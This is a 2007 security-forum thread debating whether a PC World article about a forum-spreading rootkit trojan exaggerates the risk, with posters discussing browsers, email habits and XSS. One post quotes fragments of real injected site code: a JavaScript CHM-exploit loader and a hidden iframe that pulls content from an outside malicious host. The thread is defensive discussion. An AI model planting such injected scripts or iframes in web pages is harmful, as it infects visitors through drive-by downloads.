Get infected with a rootkit trojan just by clicking on a link in a forum!

Discussion in 'other security issues & news' started by AlamoCity, May 5, 2007.

Thread Status:
Not open for further replies.
  1. AlamoCity
    Offline

    AlamoCity Registered Member

    The title of this thread sounds pretty absurd, right? But that's basically what the following article is saying: http://www.pcworld.com/article/id,129431-page,1-c,trojanhorses/article.html

    As it makes the ridiculously broad statement that "Anyone clicking on the link will only find their system infected."

    Hasn't the author ever heard of anti-virus/anti-trojan programs? Not to mention firewalls, the FireFox browser, and many other miscellaneous security related programs?? Why would a reputable company like PC World destroy their credibility by publishing an article with such a nonsensical statement?

    Because it will mislead tens of thousands of 'security newbies', and make them afraid to click on any link. Please post your opinion on this article, as I'm curious what other Wilder's users think about it.
  2. bigc73542
    Offline

    bigc73542 Retired Moderator

    I think you are reading more into this than is there. They seem to be telling what the malware is and what can happen not what is going to necessarily happen.
  3. AlamoCity
    Offline

    AlamoCity Registered Member

    You know that, and I know that, but my point is that tens of thousands of 'security newbies' won't know it. Also, the article doesn't even give a hint about what vulnerabilities need to be present in order to be infected.

    For example, do you have to be using the IE browser with ActiveX enabled? Or can you be infected merely by having javascript enabled on your FireFox browser? In other words, it's illogical to simply tell people what can happen in the worst case scenario. Thus newbies will be more likely to accept the statement at face value, and will stop clicking on links in forums, etc.
  4. Mrkvonic
    Online

    Mrkvonic Linux Systems Expert

    Hello,
    My answer to this is: Experts say ... on my website.
    Mrk
  5. Escalader
    Offline

    Escalader Registered Member

    Hi Mrk:

    Can't click your link cause PC world scared me! :rolleyes:
  6. Mrkvonic
    Online

    Mrkvonic Linux Systems Expert

    Hello,

    There is a fair chances are nothing bad will happen.
    But as Heisenberg proved, you can never know for sure, always a shred of uncertainty. Go ahead and read, will only do you good...

    Regarding the article: pure fear-mongering for controlling the masses. Just like any other sort of propaganda, including political.

    Mrk
  7. elio
    Offline

    elio Registered Member

    Have you seen this link?

    Have you seen this link?

    ~Direct download removed - Provide a url to the page containing the info instead - Ron ~
    Last edited by a moderator: May 6, 2007
  8. lodore
    Offline

    lodore Registered Member

    yes its caused using IE with unsigned activex controls allowed automatically:D
    so to stop the risk use a alternate browser such as opera or firefox to reduce the risk.
    lodore
  9. elio
    Offline

    elio Registered Member

    Have you seen this link to the link?

    Have you seen this link to the link?
    Link to link to video

    (sorry Ron, I didn't know the "no direct downloads" policy)
  10. TonyW
    Offline

    TonyW Registered Member

    It isn't that nonsensical when you consider the many people out there who aren't adequately protected by at least one or more of the type of programs you mention. If they do click on the links and aren't protected, they are in danger of being infected in the manner described.
  11. Mele20
    Offline

    Mele20 Former Poster

    The article states:

    "An initial infection is still carried out via e-mail, which touts a link that when clicked downloads a number of malware components to a victimized machine."

    That is a world of difference from you saying the articlesays clicking on a link in a forum will get you a rootkit.

    No sane user ever clicks on a link in email. So, this a minor thing. Email should always be read in Plain Text and never click on a link, never open an attachment even if expecting it without first confirming with the party that they did in fact send an email with an attachment at such and such a time and even then ALWAYS download the attachment to disk and scan before opening. If newbies don't want to practice safe computing, I don't have much sympathy for them. If you practice safe computing you won't get the initial crap needed for this particular exploit to work.
  12. 19monty64
    Offline

    19monty64 Registered Member

    Not wanting to pratice safe computing is a lot different than not knowing the rules of safe computing!!! As a parent I don't blame my kids for what they don't know, but rather myself for not teaching them. My daughters practice "safe-surfing" but they have lots of stories of what happened to so-and-so's pc (and what it cost their parents to fix.) The sad part is, their school's computers are in no better shape as even the "educators" have no idea of how to back up important files, let alone what safe computing is all about.
  13. AlamoCity
    Offline

    AlamoCity Registered Member

    I agree with you. Many people don't use an anti-virus program at all. I didn't use one myself for at least a year, and my only security was a software firewall. So it's possible that I could have been infected with this trojan simply by having javascript enabled on my Firefox browser.

    As the author of the article didn't think it was important to provide any details about what vulnerabilities need to be in place to get infected. And PC World apparently wanted to scare their readers so people like me would make an issue about it, and thus get more traffic to their site to see their ads. :)

    But I still think the statement is nonsensical when applied to "everyone", given the large percentage of people who are adequately protected. Because the way the article is written, readers could easily assume that it's a new exploit that no one can protect themselves against. For example, the statement implies:

    1) It's not necessary to be using Internet Explorer/ActiveX to get infected. All it takes is to have javascript enabled on a 'safe' browser like Firefox.

    2) Anti-virus/anti-trojan programs can't detect it because the trojan is cleverly programmed to utilize javascript to automatically change it's 'signature' every time the compromised web page is opened.
  14. AlamoCity
    Offline

    AlamoCity Registered Member

    What I said is accurate. You misunderstood the article. The email exploit is how the trojan author 'recruits' unsuspecting people to help spread the trojan via forums, etc.

    For example, if you were infected, the "malware components" that had been installed on your hard drive would automatically include the 'booby trapped' link in your forum posts.

    Thus readers would assume you included the link as part of your posts. And they would be infected with the rootkit merely by clicking on the link, depending on what vulnerabilities need to be in place.

    Then there are a lot of insane people who are not in mental hospitals. :)
  15. Mrkvonic
    Online

    Mrkvonic Linux Systems Expert

    Prove it.
    Mrk
  16. AlamoCity
    Offline

    AlamoCity Registered Member

    You misunderstood. I was not stating that as being factual, it was intended only as an example of what the author of the article implied by making the broad statement that "Anyone clicking on the link will only find their system infected." Which is why I put the following above it: "For example, the statement implies:"

    :D
  17. Mele20
    Offline

    Mele20 Former Poster


    That article states that to get infected you have to click on the email link. Getting infected involves first clicking on the email link. That has nothing to do with scripts in Firefox. To get infected via the forum link requires that you first have the necessary files on your computer from the email link. That is what the author wrote in the article. If you click on the link from the forum AND YOU HAVE THE NECESSARY FILES ON YOUR COMPUTER FROM THE EMAIL LINK THEN YOU GET INFECTED. If you don't have the necessary files, then clicking on the forum link does nothing. This is an email exploit in two stages. That is what the article states. Now whether or not that is true or false, I don't know because I have not personally tested it.
  18. Rmus
    Offline

    Rmus Exploit Analyst

    Did we read the same article? I don't see the following words/phrases that you mention:

    -------------------------------
    ActiveX
    'safe' browser
    Firefox
    signature
    javascript
    the trojan is cleverly programmed
    --------------------------------

    Isn't stating that they are "implied" jumping to a conclusion?

    However, to take 'javascript' thingy which you mention - and it comes up often: I'll echo Mrk, and ask for examples in the wild.

    Looking at recent ones, all of the javascript code launches exploits particular to IE, and I've never found one to work in Opera (and I would assume FireFox)

    1) BellSouth Support Page

    Code:
    SCRIPT language=JavaScript>
     document.write( 'OBJECT Width = 0 Height = 0 style="display:none;" 
    type ="text/x-scriptlet" data="' + mhStr + url + '/[b]test.chm::/test.htm[/b]"> /OBJECT');
     window.status = " ";
    /SCRIPT>
    
    ....snip....
    
    $WWKeywordLinks/Property½M /newproject.hhc
    {newproject.hhk¨|‚"/test.exe…  /test.htm
    
    The IE chm file exploit remotely downloads the payload: here, test.htm/test.exe by displaying the HTML Help box:

    http://www.urs2.net/rsj/computing/imgs/chm-alert2.gif
    ___________________________________________________________________________________________

    2) Miami Dolphin Site

    A screenshot of the site and page source code is here:

    http://www.websense.com/securitylabs/alerts/alert.php?AlertID=733

    The cached 3.js file contains the old iframe vulnerability

    Code:
    document.write("<iframe ... src='http://www.zj5173.com/1.htm'></iframe>")
    
    Does anyone know of examples - not PoC - that would run in Opera or FireFox?

    The article states,
    Scare tactics as some have stated? Maybe a bit strong, but certainly fits with the type of reporting in much of the security "journalism," so-called. It leads the reader to assume that these things will occur, as if there is nothing to prevent them.

    Again from the article:
    Well, that's nice, but a missed opportunity to remind readers that even in cases of the inadvertant click, there are many ways of preventing what would seem to be the inevitable, as you well point out in your first post.

    Finally,

    Here you are right on the mark, so if the article doesn't offer any solutions, how do the 'newbies' (I think we need a different description) learn of solutions?


    regards,

    -rich

    ________________________________________________________________
    "Talking About Security Can Lead To Anxiety, Panic, And Dread...
    Or Cool Assessments, Common Sense And Practical Planning..."
    --Bruce Schneier​
  19. AlamoCity
    Offline

    AlamoCity Registered Member

    You're still misunderstanding the article, as what you say above is 100% wrong. The article states:

    "An initial infection is still carried out via e-mail, which touts a link that when clicked downloads a number of malware components to a victimized machine. Once on a PC, however, the malicious code injects itself into the network stack as a rootkit and analyzes all outbound Web traffic."

    Why would you think you've got to click on a second link, in a forum, etc., in order to get infected? As according to the above paragraph, you've already been nailed when you click on the link in the email. As the above paragraph spells out that your computer is injected with a rootkit trojan, period.

    And if you can get infected with a rootkit trojan merely by clicking on a link in an html email, why would you think you can't get infected by clicking on a link in an html web page, if you don't have an anti-virus program that can stop it?

    I think you're being confused by the article saying "An initial infection". What that means is the email exploit is how the trojan writer 'recruits' unsuspecting victims to help spread the trojan via forums, etc., which is what I told you in my last post.

    Again, once you're infected by clicking on the link in the email, the trojan author uses your computer to pass on the infection by automatically including the 'booby trapped' link in your forum posts:

    "It has hooks for boards, e-mail, and blogs," said Alperovitch. When a user on an infected PC posts a message to a forum or blog, or sends a message via popular Web-based mail services such as Hotmail, Gmail, and Yahoo Mail the Trojan adds text to the entry or message.

    "It inserts 'Have you seen this link?' along with a link to what seems to be a video," Alperovitch said. Anyone clicking on the link will only find their system infected.
    "

    Yes, "this is an email exploit in two stages", but victims are infected with the trojan in each stage. The email stage is, again, to recruit unsuspecting victims to help spread the trojan via forums, etc. But whether you're infected by clicking on an email or web page link, your computer is then 'owned' by the trojan writer. In the sense that he adds you to his army of hijacked computers to use for DOS attacks, spamming, etc.

    Snap out of your denial! :D Again, it doesn't take two stages to get infected! You can open your email in plain text all day, every day, but it won't do you any good if you click on the wrong link on a web page. (Depending on the vulnerabilities that need to be in place in order to be infected.) Get Snoopfree, as that's excellent for detecting hooks.
  20. Rmus
    Offline

    Rmus Exploit Analyst

    Why bother continuing arguing in support of the silly blather opined by the author? Just because that happens to some people, doesn't mean it's a given. To add to his discussion is no better than the author presenting his original assertion, as you rightfully state in your original post:

    In a security forum, this type of article should be immediately countered with arguments explaining how it's nigh impossible for remote code execution to drop its payload, when proper security measures are in place, followed by some discussion as to those methods.

    That puts a stop to this silly propaganda, which will continue as long as readers oooh and aaah and shudder at such pronouncements, unaware that proper security nullifies such stuff.

    regards,

    -rich

    ________________________________________________________________
    "Talking About Security Can Lead To Anxiety, Panic, And Dread...
    Or Cool Assessments, Common Sense And Practical Planning..."
    --Bruce Schneier​
  21. AlamoCity
    Offline

    AlamoCity Registered Member

    The reason you don't see the following two quotes in the article is because they aren't in the article:

    1) "It's not necessary to be using Internet Explorer/ActiveX to get infected. All it takes is to have javascript enabled on a 'safe' browser like Firefox.

    2) Anti-virus/anti-trojan programs can't detect it because the trojan is cleverly programmed to utilize javascript to automatically change it's 'signature' every time the compromised web page is opened.
    "

    I wrote them. I conjured them up out of my own brain. As I told Mrkvonic in response to his post, they are intended only as an example of what the author of the article implied (in my opinion) by making the extremely broad statement that "Anyone clicking on the link will only find their system infected." Which is why I put the following above the quotes in my original post: "For example, the statement implies:"

    I had no idea they would cause confusion, or that people wouldn't read "For example, the statement implies", which would have avoided the confusion. Now I know better! :D

    Not as far as I'm concerned, but again, that's just my opinion. By making the statement that "Anyone clicking on the link will only find their system infected", the author could mean anything. Which could obviously include the examples I listed above, which caused the confusion.

    Again, the "javascript' thingy" was just an example I used off the top of my head. I have no idea how the exploit works. It probably depends on the victims using Outlook to be infected by email, and Internet Explorer to be infected by web pages. But that's just a guess. Maybe Mele20 will do some research on it and report back to this thread, once he/she snaps out of the denial stage. :D
  22. Rmus
    Offline

    Rmus Exploit Analyst

    I understand that, but in light of your first statement...
    ... I don't understand why you would amplify on it, and imply anything that would tend to make unaware readers more unsure of things than they are.

    Why yell "Fire" when there is no fire :)


    regards,

    -rich
  23. Rmus
    Offline

    Rmus Exploit Analyst

    PC World certainly reaches a widely diversified readership, from those just starting out in security, to those more experienced.

    For the first group, the scenarios it suggests are bound to instill fear, to say the least, because they offer no real solutions, save "don't click on the email."

    For the second group - the more experienced - without posting any code, the reader is given nothing to analyze.

    If I were writing the article, I would use the first two paragraphs as is, and change the third with added words in bold:

    Then, would follow discussion of some solutions. Since the article uses "Storm" as an example, I would end with a link to the write-up at sans.org, and include the following quote:

    http://isc.sans.org/diary.html?storyid=2618
    I would omit the doomsday pronouncements.

    The part of the article about hooks and stuff is worthless without further analysis - best left to a security site like WebSense or Sophos, unless the PC editors would permit a longer article which would include detection techniques.

    On my scale of 1 - 5, it rates a "0" since it doesn't even weigh in, and should not have gotten past the editor's desk in its present form.

    regards,

    -rich

    ________________________________________________________________
    "Talking About Security Can Lead To Anxiety, Panic, And Dread...
    Or Cool Assessments, Common Sense And Practical Planning..."
    --Bruce Schneier​
  24. AlamoCity
    Offline

    AlamoCity Registered Member

    Because I assumed that people using Wilders Security Forums are more knowledgeable about exploits than the average person reading the article on the PC World site. And thus they would immediately comprehend the point I was trying to make in my response to TonyW:

    "But I still think the statement is nonsensical when applied to "everyone", given the large percentage of people who are adequately protected. Because the way the article is written, readers could easily assume that it's a new exploit that no one can protect themselves against. For example, the statement implies:"

    I still think they were appropriate examples to use, given the extremely broad statement the author made: "Anyone clicking on the link will only find their system infected."

    But you're assuming there is no fire. :) For all we know, the author could be correct, and anyone could be infected by clicking on a web page link. This would mean that your antivirus program won't help you, and you're vulnerable even while using Firefox. :)
  25. elio
    Offline

    elio Registered Member

    Re: Have you seen this link to the link?

    OK, this was obviously a joke about the vector for this supposed infection.
    And I think everybody here agrees that with a safe up-to-date browser, safe up-to-date plugins (QuickTime+Java vuln anyone?), safe up-to-date OS (.ANI cursor vuln anyone?) and up-to-date virus signatures, getting infected by clicking a link is quite unlikely (0 days anyone?)

    But did anybody actually follow my link above and watch the video?
    It's quite enjoyable, Billy Hoffman is a funny guy.

    Even if we couldn't get our local system owned by a link, we probably have valuable properties online.
    And if we've got none yet, that's gonna quickly change as governments, banks and major businesses are moving a large part of their activities to the web.
    One day we may even find ourselves using one of those evil Google applications to process sensible data.

    According to RSnake, 80% of web sites are vulnerable to XSS and 99% users have JavaScript enabled.
    It sounds scary, because it means our identities and other valuable information (even money) tied to those sites can be leaked if we click on the wrong link.

    Is there anything you, as security experts, suggest to protect ourselves from this?
Thread Status:
Not open for further replies.